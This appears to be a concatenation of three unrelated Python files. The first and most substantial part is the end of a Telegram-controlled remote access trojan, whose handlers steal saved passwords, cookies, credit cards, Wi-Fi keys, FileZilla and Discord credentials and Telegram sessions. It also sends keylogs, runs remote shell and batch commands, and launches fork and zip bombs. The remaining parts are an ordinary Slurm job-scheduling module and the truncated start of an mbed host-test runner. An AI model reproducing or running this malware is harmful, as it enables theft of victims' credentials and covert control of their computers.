bot.send_message(command.chat.id, '_Enter your URL_\n\n*› /OpenURL*', parse_mode='Markdown')
# Sets the desktop wallpaper
@bot.message_handler(content_types=['photo'])
def Wallpapers(command):
Photo = bot.get_file(command.photo[len(command.photo)-1].file_id)
File = bot.get_file(command.photo[len(command.photo)-1].file_id)
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as new_file:
new_file.write(DownloadedFile)
SetWallpapers(Photo, Directory)
bot.reply_to(command, '_ The Photo has been set on the Wallpapers!_', parse_mode='Markdown')
# Infinite start CMD.exe
@bot.message_handler(regexp='/ForkBomb')
def ForkBomb(command):
bot.send_message(command.chat.id, '_Preparing ForkBomb..._', parse_mode='Markdown')
Forkbomb()
# Endless file creation
@bot.message_handler(regexp='/ZipBomb')
def ZipBomb(command):
bot.send_message(command.chat.id, '_Preparing ZipBomb..._', parse_mode='Markdown')
Zipbomb()
# Gets Wifi Password
@bot.message_handler(regexp='/WiFi')
def WiFi(command):
try:
bot.send_message(command.chat.id,
'_Received Wi-Fi Data_'
'\n'
'\n*SSID* » `' + StealWifiPasswords()['SSID'] + '`' +
'\n*AUTH* » `' + StealWifiPasswords()['AUTH'] + '`' +
'\n*Cipher* » `' + StealWifiPasswords()['Cipher'] + '`' +
'\n*Security Key* » `' + StealWifiPasswords()['SecurityKey'] + '`' +
'\n*Password* » `' + StealWifiPasswords()['Password'] + '`',
parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to authenticate Wi-Fi._', parse_mode='Markdown')
# Gets FileZilla Password
@bot.message_handler(regexp='/FileZilla')
def FileZilla(command):
try:
bot.send_message(command.chat.id,
'_Received FileZilla Data_'
'\n'
'\n*Hostname* » `' + StealFileZilla()['Hostname'] + '`' +
'\n*Username* » `' + StealFileZilla()['Username'] + '`' +
'\n*Password* » `' + StealFileZilla()['Password'] + '`',
parse_mode='Markdown')
except:
bot.reply_to(command, '_FileZilla not installed._', parse_mode='Markdown')
# Gets Discord Token
@bot.message_handler(regexp='/Discord')
def Discord(command):
try:
bot.send_message(command.chat.id, '*Discord Token*\n\n`' + DiscordToken() + '`', parse_mode='Markdown')
except:
bot.reply_to(command, '_Discord not installed._', parse_mode='Markdown')
# Gets the user current telegram session
@bot.message_handler(regexp='/Telegram')
def Telegram(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
TelegramSession(Directory)
Telegram = open(Directory + 'tdata.zip', 'rb')
bot.send_document(command.chat.id, Telegram)
except:
bot.reply_to(command, '_Telegram not installed._', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/CreditCards')
def CreditCards(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'CreditCards.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCreditCards())
CreditCards = open(Directory + 'CreditCards.txt', 'rb')
bot.send_document(command.chat.id, CreditCards)
except:
bot.reply_to(command, '_CreditCards not found._', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Bookmarks')
def Bookmarks(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Bookmarks.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedBookmarks())
Bookmarks = open(Directory + 'Bookmarks.txt', 'rb')
bot.send_document(command.chat.id, Bookmarks)
except:
bot.reply_to(command, '_Bookmarks not found._', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Passwords')
def Passwords(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Passwords.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedPasswords())
Passwords = open(Directory + 'Passwords.txt', 'rb')
bot.send_document(command.chat.id, Passwords)
except:
bot.reply_to(command, '_Passwords not found._', parse_mode='Markdown')
# Retrieves saved cookies from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Cookies')
def Cookies(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Cookies.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCookies())
Cookies = open(Directory + 'Cookies.txt', 'rb')
bot.send_document(command.chat.id, Cookies)
except:
bot.reply_to(command, '_Cookies not found._', parse_mode='Markdown')
# Gets saved browser history (Opera, Chrome)
@bot.message_handler(regexp='/History')
def History(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'History.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedHistory())
History = open(Directory + 'History.txt', 'rb')
bot.send_document(command.chat.id, History)
except:
bot.reply_to(command, '_History not found._', parse_mode='Markdown')
# Editing and viewing the clipboard
@bot.message_handler(regexp='/Clipboard')
def Clipboard(command):
try:
Text = re.split('/Clipboard ', command.text, flags=re.I)[1]
SetClipboard(Text)
bot.reply_to(command, '_Clipboard contents changed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter your text_'
'\n'
'\n*› /Clipboard*'
'\n'
'\n_Clipboard Content_'
'\n'
'\n`' + GetClipboard() + '`',
parse_mode='Markdown')
# Receive Keylogs
@bot.message_handler(regexp='/Keylogger')
def Keylogger(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
Keylogs = open(os.getenv('Temp') + '\\Keylogs.txt', 'rb')
bot.send_document(command.chat.id, Keylogs)
except:
bot.send_message(command.chat.id, '_No keylogs recorded._', parse_mode='Markdown')
@bot.message_handler(regexp='/SendKeys')
def SendKeys(command):
try:
Text = re.split('/SendKeys ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Sending keys..._', parse_mode='Markdown')
SendKeyPress(Text)
bot.reply_to(command, '_Text successfully typed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /SendKeys*', parse_mode='Markdown')
# Display Rotate <0,90,180,270>
@bot.message_handler(regexp='/Rotate')
def Rotate(command):
try:
Position = re.split('/Rotate ', command.text, flags=re.I)[1]
DisplayRotate(Degrees=Position)
bot.reply_to(command, '_The Display has been rotated!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select display rotation_'
'\n'
'\n*› /Rotate*'
'\n'
'\n_Provisions_'
'\n'
'\n`0` / `90` / `180` / `270`',
parse_mode='Markdown')
# Audio volume control
@bot.message_handler(regexp='/Volume')
def Volume(command):
try:
Level = re.split('/Volume ', command.text, flags=re.I)[1]
VolumeControl(Level)
bot.send_message(command.chat.id, '_Audio volume set to_ *' + Level + '* _level!_', parse_mode='Markdown')
except ValueError:
bot.send_message(command.chat.id, '_Specify the volume level in numbers_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the audio volume_\n\n*› /Volume*', parse_mode='Markdown')
# Monitor <on/off>
@bot.message_handler(regexp='/Monitor')
def Monitor(command):
try:
Monitor = re.split('/Monitor ', command.text, flags=re.I)[1]
if Monitor.lower() == 'Off'.lower():
Off()
bot.reply_to(command, '_The Monitor has been Off_', parse_mode='Markdown')
if Monitor.lower() == 'On'.lower():
On()
bot.reply_to(command, '_The Monitor has been On_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select monitor mode_'
'\n'
'\n*› /Monitor*'
'\n'
'\n_Modes_'
'\n'
'\n`On` / `Off`',
parse_mode='Markdown')
# Lock input (keyboard and mouse) for the selected number of seconds
@bot.message_handler(regexp='/Freeze')
def Freeze(command):
if Admin() is False:
bot.send_message(command.chat.id, '_This function requires admin rights._', parse_mode='Markdown')
if Admin() is True:
try:
Seconds = re.split('/Freeze ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Keyboard and mouse locked for_ *' + Seconds + '* _seconds!_', parse_mode='Markdown')
Block(float(Seconds))
bot.reply_to(command, '_Keyboard and mouse are now unlocked!_', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Specify the duration of the lock in seconds._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the duration of the lock_\n\n*› /Freeze*', parse_mode='Markdown')
# CD-ROM Control
@bot.message_handler(regexp='/DVD')
def DVD(command):
try:
DVD = re.split('/DVD ', command.text, flags=re.I)[1]
if DVD.lower() == 'Open'.lower():
OpenCD()
bot.reply_to(command, '_The CD-ROM has been openned!_', parse_mode='Markdown')
if DVD.lower() == 'Close'.lower():
CloseCD()
bot.reply_to(command, '_The CD-ROM has been closed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select CD-ROM mode_'
'\n'
'\n*› /DVD*'
'\n'
'\n_Modes_'
'\n'
'\n`Open` / `Close`',
parse_mode='Markdown')
# Remote command execution (CMD)
@bot.message_handler(regexp='/CMD')
def CMD(command):
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
CMD = subprocess.Popen(Command,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
Lines = []
for Line in CMD.stdout.readlines():
Line = Line.strip()
if Line:
Lines.append(Line.decode('cp866'))
Output = '\n'.join(Lines)
bot.send_message(command.chat.id, Output)
except:
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
SplittedText = telebot.util.split_string(Output, 4096)
for Output in SplittedText:
bot.send_message(command.chat.id, Output)
except UnboundLocalError:
bot.reply_to(command, '_Command completed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your command_\n\n*› /CMD*', parse_mode='Markdown')
# Remote command execution (BAT)
@bot.message_handler(regexp='/BAT')
def BAT(command):
try:
Command = re.split('/BAT ', command.text, flags=re.I)[1]
File = Directory + 'Command.bat'
BatchFile = open(File, 'w').write(Command)
if Admin() is False:
os.startfile(File)
if Admin() is True:
os.startfile(File, 'runas')
bot.reply_to(command, '_Command completed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your command_\n\n*› /BAT*', parse_mode='Markdown')
# Getting location by BSSID
@bot.message_handler(regexp='/Location')
def Location(command):
try:
bot.send_chat_action(command.chat.id, 'find_location')
Coordinates = GetLocationByBSSID(GetMacByIP())
Latitude = Coordinates['lat']
Longitude = Coordinates['lon']
bot.send_location(command.chat.id, Latitude, Longitude)
bot.send_message(command.chat.id,
'_Location_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*Latitude* » `' + str(Coordinates['lat']) + '`' +
'\n*Longitude* » `' + str(Coordinates['lon']) + '`' +
'\n*Range* » `' + str(Coordinates['range']) + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`',
parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Failed locate target by BSSID_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`',
parse_mode='Markdown')
# System Information
@bot.message_handler(regexp='/Info')
def Info(command):
try:
bot.send_chat_action(command.chat.id, 'typing')
bot.send_message(command.chat.id,
'\n_Computer Info_'
'\n'
'\n*System Version* » `' + Windows() + '`' +
'\n*Computer Name* » `' + str(Computer('ComputerSystem', 'Name')) + '`' +
'\n*Computer Model* » `' + str(Computer('ComputerSystem', 'Model')) + '`' +
'\n*Manufacturer* » `' + str(Computer('ComputerSystem', 'Manufacturer')) + '`' +
'\n*System Time* » `' + SystemTime() + '`' +
'\n*Username* » `' + os.getlogin() + '`' +
'\n'
'\n'
'\n_Hardware_'
'\n'
'\n*CPU* » `' + str(Computer('CPU', 'Name')) + '`' +
'\n*GPU* » `' + str(Computer('path Win32_VideoController', 'Name')) + '`' +
'\n*RAM* » `' + str(RAM()) + '`' +
'\n*ARM* » `' + platform.architecture()[0] + '`' +
'\n'
'\n'
'\n_Protection_'
'\n'
'\n*Started as Admin* » `' + str(Admin())+ '`' +
'\n*Process Protected* » `' + str(ProcessBSODProtectionEnabled) + '`' +
'\n*Installed Antivirus* » `' + Antivirus[0] + '`',
parse_mode='Markdown')
except:
pass
# Command handler / help
@bot.message_handler(commands=['Help', 'help'])
def Help(command):
bot.send_message(command.chat.id,
'ᅠᅠᅠᅠ ⚙️ *Commands* ⚙️'
'\n'
'\n'
'\n*/Info* - _System Information_'
'\n*/Location* - _Location by BSSID_'
'\n'
'\n*/Screen* - _Desktop Capture_'
'\n*/Webcam* - _Webcam Capture_'
'\n*/Audio* - _Sound Capture_'
'\n*/Power* - _Computer Power_'
'\n*/Autorun* - _Startup Management_'
'\n'
'\n*/Files* - _Files Manager_'
'\n› */CD* - _Change Directory_'
'\n› */ls* - _List of Files_'
'\n› */Remove* - _Remove a File_'
'\n› */Upload* - _Upload File_'
'\n› */Download* - _Download File_'
'\n› */Run* - _Run File_'
'\n*/Tasklist* - _Process list_'
'\n*/Taskkill* - _Process Kill_'
'\n'
'\n*/Message* - _Send Message_'
'\n*/Speak* - _Speak Message_'
'\n*/OpenURL* - _Open URL_'
'\n*/Wallpapers* - _Set Wallpapers_'
'\n'
'\n*/WiFi* - _Wi-Fi Data_'
'\n*/FileZilla* - _FTP Client_'
'\n*/Discord* - _Discord Token_'
'\n*/Telegram* - _Telegram Session_'
'\n*/CreditCards* - _Get CreditCards_'
'\n*/Bookmarks* - _Get Bookmarks_'
'\n*/Passwords* - _Get Passwords_'
'\n*/Cookies* - _Get Cookies_'
'\n*/History* - _Get History_'
'\n'
'\n*/ZipBomb* - _Memory Overflow_'
'\n*/ForkBomb* - _Launch Programs_'
'\n'
'\n*/Clipboard* - _Clipboard Editing_'
'\n*/Keylogger* - _Receive Keylogs_'
'\n*/SendKeys* - _Send Key Press_'
'\n*/Monitor* - _Monitor Control_'
'\n*/Volume* - _Volume Control_'
'\n*/Rotate* - _Display Rotate_'
'\n*/Freeze* - _Block Input_'
'\n*/DVD* - _CD-ROM_'
'\n'
'\n*/CMD* - _Remote Shell_'
'\n*/BAT* - _Batch Scripting_'
'\n'
'\n',
#'\n*Coded by Bainky | @bainki 👾*',
reply_markup=menu, parse_mode='Markdown')
# Navigation buttons
@bot.message_handler(commands=['3', '6'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=menu, parse_mode='Markdown')
@bot.message_handler(commands=['2', '5'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['4', '1'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main8, parse_mode='Markdown')
@bot.message_handler(commands=['Power', 'power'])
def Power(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main2, parse_mode='Markdown')
@bot.message_handler(commands=['Autorun', 'autorun'])
def Autorun(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main3, parse_mode='Markdown')
@bot.message_handler(commands=['Files', 'files'])
def Files(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main7, parse_mode='Markdown')
@bot.message_handler(commands=['Cancel'])
def CancelFiles(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['Wallpapers', 'wallpapers'])
def Wallpapers(command):
bot.send_message(command.chat.id, '_Send photo which you would like to set on the Wallpapers_', parse_mode='Markdown')
try:
bot.polling(none_stop=True)
except:
os.startfile(CurrentPath)
sys.exit()
|
platform.py | import logging
import os
import re
import shlex
import subprocess
import sys
import threading
logger = logging.getLogger('textpipes')
MULTISPACE_RE = re.compile(r'\s+')
# built-in resource classes:
# make_immediately, default, short
# other suggestions:
# gpu, gpushort, multicore, bigmem, long
def make_override_string(overrides):
if not overrides:
return ''
override_str = ';'.join(
'{sec_key}={val}'.format(sec_key=sec_key, val=val)
for (sec_key, val) in sorted(overrides.items()))
return ' --overrides "{}"'.format(override_str)
def parse_override_string(override_str):
overrides = {}
if override_str is not None:
for pair in override_str.split(';'):
sec_key, val = pair.split('=')
overrides[sec_key] = val
return overrides
def passthrough_args(conf):
result = []
if conf.force:
result.append(' --force')
return ''.join(result)
def patch_conf_string(patch_confs):
if not patch_confs:
return ''
return ' '.join('--patch-conf {}'.format(patch_conf) for patch_conf in patch_confs)
class Platform(object):
def __init__(self, name, conf):
self.name = name
self.conf = conf
self.make_immediately = False
def read_log(self, log):
pass
def _cmd(self, recipe, conf, sec_key, overrides=None, patches=None):
override_str = make_override_string(overrides)
pargs = passthrough_args(conf)
patch_str = patch_conf_string(patches)
return 'python {recipe}.py {conf}.ini --make {sec_key} --platform {platform}{overrides}{pargs} {patch_str}'.format(
recipe=recipe.name, conf=conf.name, sec_key=sec_key,
platform=self.name, overrides=override_str,
pargs=pargs, patch_str=patch_str)
def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
# -> job id (or None if not scheduled)
raise NotImplementedError()
def post_schedule(self, job_id, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
pass
def check_job(self, job_id):
raise NotImplementedError()
def resource_class(self, resource_class):
if 'resource_classes' not in self.conf:
return ''
if 'resource_classes.map' in self.conf:
resource_class = self.conf['resource_classes.map'].get(
resource_class, resource_class)
if resource_class not in self.conf['resource_classes']:
return self.conf['resource_classes']['default']
return self.conf['resource_classes'][resource_class]
def autolog_for_jobid(self, job_id, conf, sec_key):
return 'slurmlogs/{}_{}_{}.stdout'.format(conf.name, sec_key, job_id)
class Local(Platform):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.make_immediately = True
def read_log(self, log):
self.job_id = log.last_job_id
def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
# dummy incremental job_id
self.job_id += 1
return str(self.job_id)
def post_schedule(self, job_id, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
"""Run immediately, instead of scheduling"""
r = run(self._cmd(recipe, conf, sec_key, overrides=overrides, patches=patches))
def check_job(self, job_id):
return 'local'
# --gres=gpu:1 -p gpushort --mem=5000 --time=0-04:00:00
# --time=5-00:00:00 --mem=23500
# --gres=gpu:teslak80:1
# --exclude=gpu12,gpu13,gpu14,gpu15,gpu16
# -p coin --mem=30000
SLURM_STATUS_MAP = {
'RUNNING': 'running',
'COMPLETI': 'running',
'COMPLETING': 'running',
'PENDING': 'scheduled',
'COMP': 'done',
'COMPLETED': 'done',
'FAIL': 'failed',
'FAILED': 'failed',
'TIME': 'failed',
'TIMEOUT': 'failed',
'CANC': 'failed',
'CANCELLED': 'failed',
'OUT_OF_ME+': 'failed',
'OUT_OF_MEMORY': 'failed',
}
RE_SLURM_SUBMITTED_ID = re.compile(r'Submitted batch job (\d*)')
class Slurm(Platform):
"""Schedule and return job id"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_status = {}
def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
rc_args = self.resource_class(rule.resource_class)
assert rc_args != 'make_immediately'
cmd = self._cmd(recipe, conf, sec_key, overrides=overrides, patches=patches)
job_name = '{}:{}'.format(conf.name, sec_key)
log_str = 'slurmlogs/{}_{}_%j.slurmout'.format(conf.name, sec_key)
for i in range(rule.chain_schedule):
if deps:
dep_args = ' --dependency=afterok:' + ':'.join(
str(dep) for dep in deps)
else:
dep_args = ''
deps = []
sbatch = 'sbatch --job-name {name} {rc_args}{dep_args} -o {log} --wrap="{cmd}"'.format(
name=job_name, cmd=cmd.replace('"', r'\"'), rc_args=rc_args,
dep_args=dep_args, log=log_str)
r = run(sbatch)
try:
job_id = str(int(RE_SLURM_SUBMITTED_ID.match(r.std_out).group(1)))
except Exception:
raise Exception('Unexpected output from slurm: ' + r.describe())
deps.append(job_id)
return job_id
def check_job(self, job_id):
if job_id == '-':
return 'unknown'
if job_id not in self._job_status:
in_queue = self._parse_squeue(job_id)
if job_id not in self._job_status:
self._parse_sacct(job_id)
if job_id in self._job_status:
(_, _, status, _) = self._job_status[job_id]
status = status.split(' ')[0]
result = SLURM_STATUS_MAP.get(status, status)
return result
return 'unknown'
def _parse_squeue(self, job_id):
print('***************** running squeue!', job_id)
r = run('squeue -j "{}" -hO jobid,state'.format(job_id), allow_fail=True)
for (i, line) in enumerate(r.std_out.split('\n')):
if len(line.strip()) == 0:
continue
parts = line.split()
if len(parts) < 2:
return False
if parts[0] == 'slurm_load_jobs':
return False
elif parts[1] in ('PENDING', 'RUNNING'):
status = parts[1]
self._job_status[job_id] = ('0:00', '-', status, 'squeue')
return True
return False
def _parse_sacct(self, job_id):
print('***************** running sacct!', job_id)
r = run('sacct -j "{}" -Pno jobid,elapsed,start,state'.format(job_id))
for (i, line) in enumerate(r.std_out.split('\n')):
if len(line.strip()) == 0:
continue
parts = line.split('|')
# FIXME not asking for reason
#if len(parts) == 5:
# job_id, time, start, status, reason = parts
#elif
if len(parts) == 4:
job_id, time, start, status = parts
reason = ''
else:
print('Unexpected output from sacct: ', line)
continue
# FIXME: non-slurm-specific namedtuple?
self._job_status[job_id] = (time, start, status, reason)
#def _parse_q(self):
# self._job_status = {}
# r = run('slurm q')
# for (i, line) in enumerate(r.std_out.split('\n')):
# if i == 0:
# continue
# line = line.strip()
# if len(line) == 0:
# continue
# fields = MULTISPACE_RE.split(line)
# (job_id, _, _, time, start, status) = fields[:6]
# reason = ' '.join(fields[6:])
# # FIXME: non-slurm-specific namedtuple?
# self._job_status[job_id] = (time, start, status, reason)
# r = run('slurm history')
# for (i, line) in enumerate(r.std_out.split('\n')):
# if i == 0:
# continue
# line = line.strip()
# if len(line) < 12:
# continue
# fields = MULTISPACE_RE.split(line)
# job_id = fields[0]
# time = fields[6]
# start = fields[2]
# status = fields[12]
# reason = ''
# # FIXME: non-slurm-specific namedtuple?
# self._job_status[job_id] = (time, start, status, reason)
class LogOnly(Slurm):
"""dummy platform for testing"""
def read_log(self, log):
self.job_id = max([0] + list(int(x) for x in log.jobs.keys()))
def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None):
rc_args = self.resource_class(rule.resource_class)
# FIXME: formatting cli args
cmd = 'python {recipe}.py {conf}.ini --make {sec_key}'.format(
recipe=recipe.name, conf=conf.name, sec_key=sec_key)
job_name = '{}:{}'.format(conf.name, sec_key)
if deps:
dep_args = ' --dependency=afterok:' + ':'.join(
str(dep) for dep in deps)
else:
dep_args = ''
print('DUMMY: sbatch --job-name {name} {rc_args}{dep_args} --wrap="{cmd}"'.format(
name=job_name, cmd=cmd, rc_args=rc_args, dep_args=dep_args))
# dummy incremental job_id
self.job_id += 1
return str(self.job_id)
def check_job(self, job_id):
if self._job_status is None:
self._parse_q()
return 'running' # FIXME
classes = {
'logonly': LogOnly,
'local': Local,
'slurm': Slurm,
}
class Command(object):
def __init__(self, cmd):
parts = shlex.split(cmd, posix=True)
if any(x in parts for x in ('|', '>', '>>', '<')):
# subshell args should not be split
self.cmd = cmd
self.subshell = True
else:
self.cmd = parts
self.subshell = False
self.process = None
self.out = None
self.err = None
self.returncode = None
self.data = None
def run(self):
if self.subshell:
self._run_shell()
else:
self._run_popen()
return self.out, self.err
def _run_shell(self):
self.returncode = subprocess.check_call(
self.cmd, shell=True)
self.out, self.err = None, None
def _run_popen(self):
def target():
self.process = subprocess.Popen(
self.cmd,
universal_newlines=True,
shell=self.subshell,
env=os.environ,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
)
self.out, self.err = self.process.communicate(None)
# FIXME: this causes deadlocked sleep
#with self.process.stderr as lines:
# for line in lines:
# sys.stderr.write(line)
# sys.stderr.flush()
#self.process.wait()
#self.out = self.process.stdout.read()
thread = threading.Thread(target=target)
thread.start()
thread.join()
if thread.is_alive():
self.process.terminate()
thread.join()
if self.process is None:
raise Exception('Running failed: {}'.format(self.cmd))
self.returncode = self.process.returncode
class Response(object):
"""A command's response"""
def __init__(self, process=None):
super(Response, self).__init__()
self._process = process
self.command = None
self.std_err = None
self.std_out = None
self.status_code = None
self.history = []
def __repr__(self):
if len(self.command):
return '<Response [{0}]>'.format(self.command[0])
else:
return '<Response>'
def describe(self):
return ('command:\n{}\nreturn code:\n{}\n'
'stdout:\n{}\nstderr:\n{}\n'.format(
self.command, self.status_code,
self.std_out, self.std_err))
def run(command, allow_fail=False):
"""Executes given command as subprocess.
If pipeing is necessary, uses a subshell."""
logger.info(command)
cmd = Command(command)
out, err = cmd.run()
r = Response(process=cmd)
r.command = command
r.std_out = out
r.std_err = err
r.status_code = cmd.returncode
if not allow_fail:
if r.status_code != 0:
print(r.std_err)
raise Exception('Nonzero status code {} when running {}'.format(
r.status_code, r.command))
return r
|
host_test_default.py | # Copyright (c) 2018, Arm Limited and affiliates.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import traceback
from time import time
from sre_compile import error
from multiprocessing import Process, Queue
from .. import host_tests_plugins, BaseHostTest
from ..host_tests_registry import HostRegistry
# Host test supervisors
from ..host_tests.echo import EchoTest
from ..host_tests.rtc_auto import RTCTest
from ..host_tests.hello_auto import HelloTest
from ..host_tests.detect_auto import DetectPlatformTest
from ..host_tests.wait_us_auto import WaitusTest
from ..host_tests.default_auto import DefaultAuto
from ..host_tests.dev_null_auto import DevNullTest
from .host_test import DefaultTestSelectorBase
from ..host_tests_logger import HtrunLogger
from ..host_tests_conn_proxy import conn_process
from ..host_tests_toolbox.host_functional import handle_send_break_cmd
if (sys.version_info > (3, 0)):
from queue import Empty as QueueEmpty
else:
from Queue import Empty as QueueEmpty
class DefaultTestSelector(DefaultTestSelectorBase):
"""! Select default host_test supervision (replaced after auto detection) """
RESET_TYPE_SW_RST = "software_reset"
RESET_TYPE_HW_RST = "hardware_reset"
def __init__(self, options):
"""! ctor
"""
self.options = options
self.logger = HtrunLogger('HTST')
self.registry = HostRegistry()
self.registry.register_host_test("echo", EchoTest())
self.registry.register_host_test("default", DefaultAuto())
self.registry.register_host_test("rtc_auto", RTCTest())
self.registry.register_host_test("hello_auto", HelloTest())
self.registry.register_host_test("detect_auto", DetectPlatformTest())
self.registry.register_host_test("default_auto", DefaultAuto())
self.registry.register_host_test("wait_us_auto", WaitusTest())
self.registry.register_host_test("dev_null_auto", DevNullTest())
# Handle extra command from
if options:
if options.enum_host_tests:
for path in options.enum_host_tests:
self.registry.register_from_path(
path, verbose=options.verbose
)
if options.list_reg_hts: # --list option
print(self.registry.table(options.verbose))
sys.exit(0)
if options.list_plugins: # --plugins option
host_tests_plugins.print_plugin_info()
sys.exit(0)
if options.version: # --version
import pkg_resources # part of setuptools
version = pkg_resources.require("mbed-host-tests")[0].version
print(version)
sys.exit(0)
if options.send_break_cmd: # -b with -p PORT (and optional -r RESET_TYPE)
handle_send_break_cmd(port=options.port,
disk=options.disk,
reset_type=options.forced_reset_type,
baudrate=options.baud_rate,
verbose=options.verbose)
sys.exit(0)
if options.global_resource_mgr or options.fast_model_connection:
# If Global/Simulator Resource Mgr is working it will handle reset/flashing workflow
# So local plugins are offline
self.options.skip_reset = True
self.options.skip_flashing = True
if options.compare_log:
with open(options.compare_log, "r") as f:
self.compare_log = f.read().splitlines()
else:
self.compare_log = None
self.serial_output_file = options.serial_output_file
self.compare_log_idx = 0
DefaultTestSelectorBase.__init__(self, options)
def is_host_test_obj_compatible(self, obj_instance):
"""! Check if host test object loaded is actually host test class
derived from 'mbed_os_tools.test.BaseHostTest()'
Additionaly if host test class implements custom ctor it should
call BaseHostTest().__Init__()
@param obj_instance Instance of host test derived class
@return True if obj_instance is derived from mbed_os_tools.test.BaseHostTest()
and BaseHostTest.__init__() was called, else return False
"""
result = False
if obj_instance:
result = True
self.logger.prn_inf("host test class: '%s'"% obj_instance.__class__)
# Check if host test (obj_instance) is derived from mbed_os_tools.test.BaseHostTest()
if not isinstance(obj_instance, BaseHostTest):
# In theory we should always get host test objects inheriting from BaseHostTest()
# because loader will only load those.
self.logger.prn_err("host test must inherit from mbed_os_tools.test.BaseHostTest() class")
result = False
# Check if BaseHostTest.__init__() was called when custom host test is created
if not obj_instance.base_host_test_inited():
self.logger.prn_err("custom host test __init__() must call BaseHostTest.__init__(self)")
result = False
return result
def run_test(self):
"""! This function implements key-value protocol state-machine.
Handling of all events and connector are handled here.
@return Return self.TestResults.RESULT_* enum
"""
result = None
timeout_duration = 10 # Default test case timeout
coverage_idle_timeout = 10 # Default coverage idle timeout
event_queue = Queue() # Events from DUT to host
dut_event_queue = Queue() # Events from host to DUT {k;v}
def callback__notify_prn(key, value, timestamp):
"""! Handles __norify_prn. Prints all lines in separate log line """
for line in value.splitlines():
self.logger.prn_inf(line)
callbacks = {
"__notify_prn" : callback__notify_prn
}
# if True we will allow host test to consume all events after test is finished
callbacks_consume = True
# Flag check if __exit event occurred
callbacks__exit = False
# Flag check if __exit_event_queue event occurred
callbacks__exit_event_queue = False
# Handle to dynamically loaded host test object
self.test_supervisor = None
# Version: greentea-client version from DUT
self.client_version = None
self.logger.prn_inf("starting host test process...")
# Create device info here as it may change after restart.
config = {
"digest" : "serial",
"port" : self.mbed.port,
"baudrate" : self.mbed.serial_baud,
"program_cycle_s" : self.options.program_cycle_s,
"reset_type" : self.options.forced_reset_type,
"target_id" : self.options.target_id,
"disk" : self.options.disk,
"polling_timeout" : self.options.polling_timeout,
"forced_reset_timeout" : self.options.forced_reset_timeout,
"sync_behavior" : self.options.sync_behavior,
